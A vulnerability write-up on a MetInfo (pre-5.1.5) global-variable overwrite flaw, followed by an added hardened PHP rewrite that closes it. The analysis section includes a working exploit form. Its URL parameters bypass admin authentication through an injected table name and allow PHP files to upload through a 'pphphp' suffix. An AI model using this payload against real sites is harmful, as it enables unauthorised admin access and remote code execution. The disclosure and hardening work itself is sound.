MetInfo released the new version 5.1.5 on the 23rd and fixed the vulnerability described in this article. Strictly speaking, it should be classified as an arbitrary variable overwrite vulnerability. PS: you are welcome to repost this in any form. First posted on t00ls.net. Without further ado, look at the code.

include/common.inc.php, lines 20-39:

```php
// Database settings are read from the config file and dumped into the global scope.
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php');
@extract($db_settings);
require_once ROOTPATH.'include/mysql_class.php';
$db = new dbmysql();
$db->dbconn($con_db_host, $con_db_id, $con_db_pass, $con_db_name);
define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
isset($_REQUEST['GLOBALS']) && exit('Access error');
require_once ROOTPATH.'include/global.func.php';
// register_globals emulation: every cookie/POST/GET key whose name does not
// start with '_' becomes a global variable, overwriting anything set above.
foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach ($$_request as $_key => $_value) {
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}
// Table names are loaded from the config table and turned into variables
// such as $met_message, $met_admin_table, ...
$query = "select * from {$tablepre}config where name='met_tablename' and lang='metinfo'";
$mettable = $db->get_one($query);
$mettables = explode('|', $mettable['value']);
foreach ($mettables as $key => $val) {
    $tablename = 'met_'.$val;
    $$tablename = $tablepre.$val;
}
```

MetInfo queries the `{$tablepre}config` table and initializes the table-name variables in the last foreach loop. The prefix `$tablepre` itself is initialized by

```php
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php');
@extract($db_settings);
```

Queries elsewhere in the system, such as `SELECT * FROM $met_message where id=$id and lang='$lang'`, then use `$met_message`, one of the variables set by that loop. The problem is the nested foreach that sits between the `extract()` and the query: it registers every `$_COOKIE`, `$_POST` and `$_GET` key whose name does not begin with `_` as a global variable (`$$_key = daddslashes($_value)`). A request parameter named `tablepre` therefore overwrites the prefix read from the config file, the `{$tablepre}config` query fails, and the table-name variables are never initialized. The same mechanism then lets the request supply the table-name variables itself.
In the admin backend I found an upload page. Using this variable overwrite, the admin authentication check can be bypassed and the list of allowed upload suffixes overwritten, which turns it into an arbitrary file upload. Exp:

Arbitrary file upload:

```html
<form enctype="multipart/form-data" method="POST" name="myform" action="http://www.2cto.com/metinfo/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp">
<input name="Filedata" type="file" size="20">
<input type="submit" name="Submit" value="Submit information">
</form>
```
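For comparison, here is the hardened counterpart of the `common.inc.php` pattern quoted above and of the upload-suffix check. This is an added example written for this article, not MetInfo's code; the `$dbSettings` array, the `request_param()` helper, the parameter allowlist, the table list and the `UPLOAD_ALLOWED_EXT` constant are all assumed stand-ins for the real configuration and upload handler. It removes the two root causes the write-up relies on: request keys are never turned into variables, and the allowed upload extensions come from a constant rather than from the request.

```php
<?php
// Added example, not MetInfo's code. Hardened version of the
// include/common.inc.php initialisation shown in the article.
//
// Root cause 1 in the original: `$$_key = daddslashes($_value)` over
// $_COOKIE/$_POST/$_GET lets a request parameter `tablepre` replace the
// value that extract($db_settings) loaded from config_db.php.
// Root cause 2: the upload handler took its suffix allowlist
// (met_file_format) from the request.

declare(strict_types=1);

// Hypothetical stand-in for parse_ini_file(ROOTPATH.'config/config_db.php').
$dbSettings = [
    'con_db_host' => 'localhost',
    'con_db_id'   => 'metinfo',
    'con_db_pass' => 'example-password',
    'con_db_name' => 'metinfo',
    'tablepre'    => 'met_',
];

// Configuration is read once from the trusted source and kept in a local
// array: no extract(), no $$variable, so the request cannot overwrite it.
$tablepre = $dbSettings['tablepre'];

// Table names are derived from the config prefix and a fixed list; the
// `$$tablename = $tablepre.$val` construct becomes an array that request
// input cannot populate. (Hypothetical table list.)
$tables = [];
foreach (['message', 'admin_table', 'config'] as $val) {
    $tables[$val] = $tablepre . $val;
}

/**
 * Return a request parameter only if its name is on the allowlist and its
 * value matches the pattern that parameter is allowed to have. Unknown
 * parameters are ignored instead of becoming variables.
 */
function request_param(string $name, array $allowed): ?string
{
    if (!isset($allowed[$name])) {
        return null;
    }
    $raw = $_GET[$name] ?? $_POST[$name] ?? null;
    if (!is_string($raw)) {
        return null;
    }
    return preg_match($allowed[$name], $raw) === 1 ? $raw : null;
}

// Hypothetical allowlist: every accepted parameter is named explicitly.
$allowedParams = [
    'lang' => '/^[a-z]{2}$/',       // language code such as "cn"
    'id'   => '/^[0-9]{1,10}$/',    // numeric record id
];

// Upload suffix allowlist is a hard-coded constant; the request cannot
// extend it the way met_file_format=jpg|pphphp did in the original.
const UPLOAD_ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

function upload_extension_allowed(string $filename): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, UPLOAD_ALLOWED_EXT, true);
}

// Usage sketch with a prepared statement instead of string interpolation
// (hypothetical PDO connection, not MetInfo's dbmysql class):
// $pdo  = new PDO("mysql:host={$dbSettings['con_db_host']};dbname={$dbSettings['con_db_name']}",
//                 $dbSettings['con_db_id'], $dbSettings['con_db_pass']);
// $stmt = $pdo->prepare("SELECT * FROM `{$tables['message']}` WHERE id = :id AND lang = :lang");
// $stmt->execute([
//     ':id'   => request_param('id', $allowedParams),
//     ':lang' => request_param('lang', $allowedParams),
// ]);
// if (!upload_extension_allowed($_FILES['Filedata']['name'] ?? '')) { /* reject */ }
```

The design point is that the table prefix and the table names are never part of the global symbol table that request input can reach, so overwriting `tablepre` or supplying `met_admin_table` has no effect; the admin check and the upload check then operate on values the request did not choose.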